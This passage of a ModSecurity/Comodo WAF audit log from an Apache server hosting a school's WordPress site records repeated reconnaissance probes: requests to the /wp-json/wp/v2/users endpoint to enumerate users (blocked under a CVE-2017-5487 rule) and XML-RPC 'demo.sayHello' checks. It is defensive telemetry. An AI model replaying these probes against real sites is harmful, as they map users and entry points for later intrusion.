[uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425160392555 5504 (- - -) Stopwatch2: 1747425160392555 5504; combined=4178, p1=506, p2=3445, p3=34, p4=37, p5=93, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cda8641-Z-- --ae069f03-A-- [17/May/2025:02:52:42 +0700] aCeXite6THFz1hsaJaLZLAAAAA8 103.236.140.4 54408 103.236.140.4 8181 --ae069f03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae069f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae069f03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425162315804 2365 (- - -) Stopwatch2: 1747425162315804 2365; combined=1108, p1=345, p2=735, p3=0, p4=0, p5=27, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae069f03-Z-- --2a63d92b-A-- [17/May/2025:02:52:46 +0700] aCeXjte6THFz1hsaJaLZLwAAABY 103.236.140.4 54414 103.236.140.4 8181 --2a63d92b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2a63d92b-C-- demo.sayHello --2a63d92b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a63d92b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425166322162 5602 (- - -) Stopwatch2: 1747425166322162 5602; combined=4154, p1=524, p2=3397, p3=40, p4=32, p5=97, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a63d92b-Z-- --1627e47a-A-- [17/May/2025:02:52:47 +0700] aCeXj9e6THFz1hsaJaLZMAAAAAM 103.236.140.4 54418 103.236.140.4 8181 --1627e47a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1627e47a-C-- demo.sayHello --1627e47a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1627e47a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425167991789 4753 (- - -) Stopwatch2: 1747425167991789 4753; combined=3667, p1=459, p2=3006, p3=25, p4=28, p5=87, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1627e47a-Z-- --96ebd94a-A-- [17/May/2025:02:53:58 +0700] aCeX1thEtho3ciA0weheJQAAAIY 103.236.140.4 54432 103.236.140.4 8181 --96ebd94a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --96ebd94a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96ebd94a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425238603791 2790 (- - -) Stopwatch2: 1747425238603791 2790; combined=1281, p1=443, p2=807, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96ebd94a-Z-- --2818dc02-A-- [17/May/2025:02:54:03 +0700] aCeX29hEtho3ciA0weheKAAAAJY 103.236.140.4 54440 103.236.140.4 8181 --2818dc02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2818dc02-C-- demo.sayHello --2818dc02-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2818dc02-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425243784812 5137 (- - -) Stopwatch2: 1747425243784812 5137; combined=3808, p1=484, p2=3125, p3=35, p4=35, p5=76, sr=59, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2818dc02-Z-- --d9e2a730-A-- [17/May/2025:02:54:07 +0700] aCeX39hEtho3ciA0weheKwAAAJc 103.236.140.4 54446 103.236.140.4 8181 --d9e2a730-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d9e2a730-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9e2a730-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425247517484 2157 (- - -) Stopwatch2: 1747425247517484 2157; combined=979, p1=329, p2=627, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9e2a730-Z-- --076fdf11-A-- [17/May/2025:02:54:18 +0700] aCeX6thEtho3ciA0weheLQAAAIQ 103.236.140.4 54450 103.236.140.4 8181 --076fdf11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --076fdf11-C-- demo.sayHello --076fdf11-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --076fdf11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425258391383 5643 (- - -) Stopwatch2: 1747425258391383 5643; combined=4223, p1=527, p2=3482, p3=28, p4=31, p5=91, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --076fdf11-Z-- --adbd6c25-A-- [17/May/2025:02:55:42 +0700] aCeYPkE0LfP59mkCzg42AAAAAMI 103.236.140.4 54466 103.236.140.4 8181 --adbd6c25-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --adbd6c25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --adbd6c25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425342652511 3330 (- - -) Stopwatch2: 1747425342652511 3330; combined=1453, p1=480, p2=940, p3=0, p4=0, p5=33, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adbd6c25-Z-- --d55a8215-A-- [17/May/2025:02:55:48 +0700] aCeYRNhEtho3ciA0weheNAAAAIw 103.236.140.4 54470 103.236.140.4 8181 --d55a8215-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d55a8215-C-- demo.sayHello --d55a8215-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d55a8215-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425348637759 4521 (- - -) Stopwatch2: 1747425348637759 4521; combined=3588, p1=419, p2=2974, p3=21, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d55a8215-Z-- --942dd219-A-- [17/May/2025:02:56:55 +0700] aCeYh9hEtho3ciA0weheNQAAAJU 103.236.140.4 54476 103.236.140.4 8181 --942dd219-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --942dd219-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --942dd219-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425415590045 2594 (- - -) Stopwatch2: 1747425415590045 2594; combined=1165, p1=420, p2=716, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --942dd219-Z-- --bbd6052b-A-- [17/May/2025:02:57:03 +0700] aCeYj9e6THFz1hsaJaLZNAAAAAY 103.236.140.4 54480 103.236.140.4 8181 --bbd6052b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.103 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bbd6052b-C-- demo.sayHello --bbd6052b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbd6052b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425423371397 6482 (- - -) Stopwatch2: 1747425423371397 6482; combined=4556, p1=578, p2=3657, p3=43, p4=41, p5=133, sr=69, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbd6052b-Z-- --ebe25825-A-- [17/May/2025:03:00:17 +0700] aCeZUdhEtho3ciA0weheOwAAAIM 103.236.140.4 54502 103.236.140.4 8181 --ebe25825-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ebe25825-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebe25825-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425617323627 2919 (- - -) Stopwatch2: 1747425617323627 2919; combined=1345, p1=433, p2=880, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebe25825-Z-- --9a930b67-A-- [17/May/2025:03:00:26 +0700] aCeZWte6THFz1hsaJaLZOAAAAAw 103.236.140.4 54506 103.236.140.4 8181 --9a930b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a930b67-C-- demo.sayHello --9a930b67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a930b67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425626793158 6555 (- - -) Stopwatch2: 1747425626793158 6555; combined=4712, p1=598, p2=3870, p3=37, p4=41, p5=100, sr=79, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a930b67-Z-- --cb63f372-A-- [17/May/2025:03:04:02 +0700] aCeaMthEtho3ciA0weheQQAAAIg 103.236.140.4 54526 103.236.140.4 8181 --cb63f372-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cb63f372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb63f372-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425842921358 2846 (- - -) Stopwatch2: 1747425842921358 2846; combined=1279, p1=422, p2=828, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb63f372-Z-- --36af9b39-A-- [17/May/2025:03:04:08 +0700] aCeaONhEtho3ciA0weheQwAAAI8 103.236.140.4 54530 103.236.140.4 8181 --36af9b39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36af9b39-C-- demo.sayHello --36af9b39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36af9b39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425848271806 5321 (- - -) Stopwatch2: 1747425848271806 5321; combined=4048, p1=515, p2=3313, p3=30, p4=33, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36af9b39-Z-- --f126e33e-A-- [17/May/2025:03:05:05 +0700] aCeacdhEtho3ciA0weheRQAAAJU 103.236.140.4 54536 103.236.140.4 8181 --f126e33e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f126e33e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f126e33e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425905489364 3298 (- - -) Stopwatch2: 1747425905489364 3298; combined=1359, p1=477, p2=850, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f126e33e-Z-- --7a0d8b03-A-- [17/May/2025:03:05:09 +0700] aCeadde6THFz1hsaJaLZOgAAABM 103.236.140.4 54540 103.236.140.4 8181 --7a0d8b03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.39 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a0d8b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a0d8b03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] 